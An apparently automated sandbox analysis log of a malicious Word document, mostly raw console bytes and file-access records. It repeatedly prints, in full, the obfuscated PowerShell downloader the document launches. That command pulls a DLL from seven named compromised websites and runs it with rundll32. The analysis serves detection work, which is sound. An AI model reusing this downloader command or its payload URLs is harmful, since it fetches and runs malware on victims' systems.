Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w............ ........Ixk......M.............................}..v....P.......0...............8.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v.....0......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....p1..............................}..v.....1......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................0.......'........................wI..... .......................}..v.....8...... ...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....'................Hxk....p9..............................}..v.....9......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....3................Ixk......M.............................}..v....X?......0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....3................Hxk.....@..............................}..v.....@......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v.....D......0...............8.M.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....G................Hxk....XE..............................}..v.....E......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....S................Ixk......M.............................}..v.....L......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....S................Hxk....XM..............................}..v.....M......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w...._................Ixk......M.............................}..v.....T......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w...._................Hxk....XU..............................}..v.....U......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....k................Ixk......M.............................}..v.....\......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....k................Hxk....X]..............................}..v.....]......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....w................Ixk......M.............................}..v.....d......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....w................Hxk....Xe..............................}..v.....e......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v.....l......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....Xm..............................}..v.....m......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v.....t......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....Xu..............................}..v.....u......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v.....|......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....X}..............................}..v.....}......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....X...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v............0.......................h.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....................................}..v....H.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....................................}..v....H.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....x.......0...............8.M.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....0...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v............0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....................................}..v....(.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w............ ........Ixk......M.............................}..v............0...............8.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....p...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....................Jqxk......M.............................}..v....p&!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....................*pxk....('!.............................}..v.....'!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....................Jqxk......M.............................}..v....H.!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....................*pxk...../!.............................}..v...../!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.6.7.1.............}..v.....3!.....0.................M.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....................*pxk....H4!.............................}..v.....4!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....................Jqxk......M.............................}..v.....;!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....................*pxk....H<!.............................}..v.....<!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....'...............Jqxk......M.............................}..v.....C!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....'...............*pxk....HD!.............................}..v.....D!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....3...............Jqxk......M.............................}..v.....K!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....3...............*pxk....HL!.............................}..v.....L!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....?...............Jqxk......M.............................}..v.....S!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....?...............*pxk....HT!.............................}..v.....T!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....K...............Jqxk......M.............................}..v.....[!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....K...............*pxk....H\!.............................}..v.....\!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....W...............Jqxk......M.............................}..v.....c!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....W...............*pxk....Hd!.............................}..v.....d!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....c...............Jqxk......M.............................}..v.....k!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....c...............*pxk....Hl!.............................}..v.....l!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....o...............Jqxk......M.............................}..v.....s!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....o...............*pxk....Ht!.............................}..v.....t!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....{...............Jqxk......M.............................}..v.....z!.....0.......................h.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....{...............*pxk.....z!.............................}..v....8{!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....................Jqxk......M.............................}..v......!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....................*pxk......!.............................}..v....8.!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w............ . . .t.e.r.B.i.n.d.i.n.g.E.x.c.e.p.t.i.o.n.....}..v....X.!.....0.................M.....,.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....................*pxk......!.............................}..v......!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....................Jqxk......M.............................}..v....X.!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....................*pxk......!.............................}..v......!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w............ . . .n.d.s...I.n.v.o.k.e.E.x.p.r.e.s.s.i.o.n.C.o.m.m.a.n.d.....0.................M.....<.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....................*pxk......!.............................}..v......!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w............ .......Jqxk......M.............................}..v......!.....0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....................*pxk....P.!.............................}..v......!.....0...............X.M.............................
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$1711.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD7E7.tmpJump to behavior
Source: classification engineClassification label: mal84.expl.winDOC@5/13@0/0
Source: 1711.docOLE document summary: title field not present or empty
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.drOLE document summary: edited time not present or 0
Source: ~DFF0F57547FC904286.TMP.0.drOLE document summary: title field not present or empty
Source: ~DFF0F57547FC904286.TMP.0.drOLE document summary: author field not present or empty
Source: ~DFF0F57547FC904286.TMP.0.drOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation:

Obfuscated command line found
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1268Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_000007FF00270F3C sldt word ptr [eax]4_2_000007FF00270F3C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000004.00000002.426548508.000000000031E000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

